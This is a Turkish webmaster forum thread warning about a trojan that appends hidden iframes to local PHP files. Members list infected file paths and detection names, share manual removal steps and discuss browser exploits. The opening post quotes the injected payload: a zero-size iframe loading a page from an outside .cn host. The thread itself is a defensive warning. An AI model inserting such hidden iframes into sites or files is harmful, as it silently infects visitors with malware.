İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Yeni Viruslere Dikkat Edelim.!!

DeviLLe

0
İyinet Üyesi
Katılım
13 Kasım 2004
Mesajlar
594
Reaction score
0
Merhaba Arkadaşlar.
Yeni piyasaya yayılan viruslere dikkat edelim lütfen çok kötü sonuçlar doğurabiliyor.
Başıma geleni kısaca anlatayım.
1. Format bi işe yaramadı.
2. çoğu antivirus programı bir işe yaramadı.
3. tüm php uzantılı dosyalarıma aşağıdaki iframe kodu eklendi.

Aşağıdaki Liste Truva Atı nın isimleri ve yerleştiği yerler.

Bulaştığı anda pc nizde bulunan tüm php uzantılı dosyalarınıza iframe ile bi siteyi ekliyor eğer ftp ile hostunuza bunu atarsanız her giren kullanıcıya truva atı virusu bulaşıyor. çoğu programa yakalanmıyor.
Benim başım yandı sizde dikkatli olun derim.


Birde nasıl kurtulduğumu anlatayım kısaca belki yardımcı olmuş olurum.

güvenli kipte açtım önce orada tarama yapıp çıkanı karantina altına aldırdım.
normal kipe geçtim baktım ki bi faydası olmamış tekrar bunlar otomatik olarak çalışıyorlar.
yerlerini tespit ettiğim için gittim o klasöre önce CTRL+ALT+DEL yapıp işlemlerde gözüken 1.exe 2.exe ... gibi programları kapattım. ama burda hızlı olmalısınız hemen açılıyor tekrar.
kapattıktan sonra bu klasörde sırasıyla 1.exe nin üzerine sağ tıklayıp tara dedim ve virus olduğunu söyledi bana hemen tümünü sil dedim.
daha sonra diğerlerine de sırasıyla yaptım. ve şu son 3 gündür hiç bir şekilde açılmıyorlar. allah kimseye bulaştırmasın derim.

İsimleri ve Bulaştıkları Yerler Aşağıdadır.

C:\WINDOWS\system32\update\1.exe\[PESpin]
Win32:pepatch-Q [Trj]


C:\WINDOWS\system32\update\4.exe\[UPX]
Win32:Qqrob-BN [Trj]


C:\WINDOWS\system32\update\7.exe
Win32:Small-AMI [Trj]


C:\WINDOWS\system32\8.exe
Win32:Small-AMI [Trj]


UYARI : Aşağıdaki Linke Sakın Tıklamayın..
<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
 

CyberTurk

0
İyinet Üyesi
Katılım
13 Mayıs 2005
Mesajlar
2,232
Reaction score
3
Konum
istanbul
Internet Explorer kullanmasaydınız bu virus bilgisayara yerleşmezdi. Bu şu anda yaygın bir exploit, yamasını cpanel yayınladı ama güncel olmayan cpanelli serverlerdeki sitelere IE ile girenleri etkiliyor
 

Teqin

0
İyinet Üyesi
Katılım
30 Ağustos 2006
Mesajlar
625
Reaction score
0
Konum
IstanBuL
siteden bulasıyorda sadece Internet Explorer olup olmadıgını bilmiyorum .. mozilla kulanıyorum ben bulasıyor bazen.
 

DeviLLe

0
İyinet Üyesi
Katılım
13 Kasım 2004
Mesajlar
594
Reaction score
0
site üzerinden mailden heryerden bulaşabiliyor. çok tehlikelidir dikkat edin.
ayrıca ie veya ff veya diğerleri bilmem ama dikkatli olun derim. kurtulmak çok zor.
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

Üst